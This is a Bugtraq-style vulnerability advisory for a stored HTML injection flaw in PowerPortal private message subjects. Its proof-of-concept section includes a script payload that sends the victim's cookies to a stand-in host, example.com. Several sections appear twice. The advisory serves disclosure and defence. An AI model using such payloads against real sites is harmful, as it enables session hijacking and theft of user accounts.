PowerPortal Private Message HTML Injection Vulnerability
BID:10835
Info
PowerPortal Private Message HTML Injection Vulnerability
| Bugtraq ID: | 10835 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 30 2004 12:00AM |
| Updated: | Jul 30 2004 12:00AM |
| Credit: | Discovery of this vulnerability is credited to vamp^ <[email protected]>. |
| Vulnerable: |
PowerPortal PowerPortal 1.3 b PowerPortal PowerPortal 1.3 PowerPortal PowerPortal 1.1 b |
| Not Vulnerable: | |
Discussion
PowerPortal Private Message HTML Injection Vulnerability
A vulnerability is reported for PowerPortal which may make it prone to HTML injection attacks. The problem is said to occur due to a lack of sufficient sanitization performed on private message data.
Specifically, when creating PowerPortal private messages, the subject field may not be sufficiently sanitized of malicious content. This may make it possible for an attacker to place HTML or script code within the subject field of a private PowerPortal message for another user.
A vulnerability is reported for PowerPortal which may make it prone to HTML injection attacks. The problem is said to occur due to a lack of sufficient sanitization performed on private message data.
Specifically, when creating PowerPortal private messages, the subject field may not be sufficiently sanitized of malicious content. This may make it possible for an attacker to place HTML or script code within the subject field of a private PowerPortal message for another user.
Exploit / POC
PowerPortal Private Message HTML Injection Vulnerability
The following examples are available:
Subject: <script>alert(document.cookie);</script>
Subject: <script>document.location='http://www.example.com/?'+document.cookie</script>
The following examples are available:
Subject: <script>alert(document.cookie);</script>
Subject: <script>document.location='http://www.example.com/?'+document.cookie</script>
Solution / Fix
PowerPortal Private Message HTML Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.